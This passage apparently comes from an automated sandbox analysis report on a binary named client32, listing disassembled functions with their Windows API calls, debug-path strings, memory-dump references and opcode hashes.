                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                              • API String ID: 0-3856134272
                                                                              • Opcode ID: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                              • Instruction ID: a4a4ce9073261333e851eebcc79e1773aa66005037fae8e918fe6f1657af3004
                                                                              • Opcode Fuzzy Hash: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                              • Instruction Fuzzy Hash: C401207AA0060997D610CE54EC40ADBB398DB8036CF04483AE65E93501D271B491C6A6
                                                                              Function 1112D6E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000001,WTSSendMessageA), ref: 1112D6F4
                                                                              • SetLastError.KERNEL32(00000078,00000000,?,1113A569,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1112D735
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: WTSSendMessageA
                                                                              • API String ID: 199729137-1676301106
                                                                              • Opcode ID: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                              • Instruction ID: 5748faf58fc4c309978bb3964bb976d1af77d24f32d17e8bed4b3b40d6b81985
                                                                              • Opcode Fuzzy Hash: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                              • Instruction Fuzzy Hash: 7E014B72650618AFCB14DF98D880E9BB7E8EF8C721F018219F959D3640C630EC50CBA0
                                                                              Function 110D1540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                              • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                              • API String ID: 175691280-2052047905
                                                                              • Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                              • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                              • Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                              • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                              Function 11015030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • m_hWnd, xrefs: 11015049
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              • Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                              • Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
                                                                              • Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                              • Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94
                                                                              Function 110D15C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                              • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                              • API String ID: 175691280-2052047905
                                                                              • Opcode ID: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                              • Instruction ID: d047ce25565584385d90dc1a88bf85935da342945f7d0a1e0c7239cac7a22c38
                                                                              • Opcode Fuzzy Hash: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                              • Instruction Fuzzy Hash: 1AF0A475A0025CBBCB00DED4DC40BEEFBA8AB45208F004099F549A7140DE706A55C7A9
                                                                              Function 1115F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetPropA.USER32(?,?,?), ref: 1115F395
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                              • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                              • API String ID: 1134434899-3115850912
                                                                              • Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                              • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                              • Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                              • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                              Function 110151E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • m_hWnd, xrefs: 110151F9
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              • Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                              • Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
                                                                              • Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                              • Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5
                                                                              Function 110173D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                              • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: QueueUserWorkItem
                                                                              • API String ID: 199729137-2469634949
                                                                              • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                              • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                              • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                              • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                              Function 11029790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • CreateThread.KERNEL32(00000000,00000000,11027530,00000000,00000000,00000000), ref: 110297DE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread__wcstoi64
                                                                              • String ID: *TapiFixPeriod$Bridge
                                                                              • API String ID: 1152747075-2058455932
                                                                              • Opcode ID: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
                                                                              • Instruction ID: 741f43c1c8d280c886d6f15773e052eeed2c6ce1e0fea61ed055b6fa2ceaecb0
                                                                              • Opcode Fuzzy Hash: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
                                                                              • Instruction Fuzzy Hash: 24F0ED39B42338ABE711CEC1DC42F71B698A300708F0004B8F628A91C9E6B0A90083A6
                                                                              Function 1101D320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                              • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: FlashWindowEx
                                                                              • API String ID: 199729137-2859592226
                                                                              • Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                              • Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
                                                                              • Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                              • Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90
                                                                              Function 11001090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                              • m_hWnd, xrefs: 110010A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2046328329-2830328467
                                                                              • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                              • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
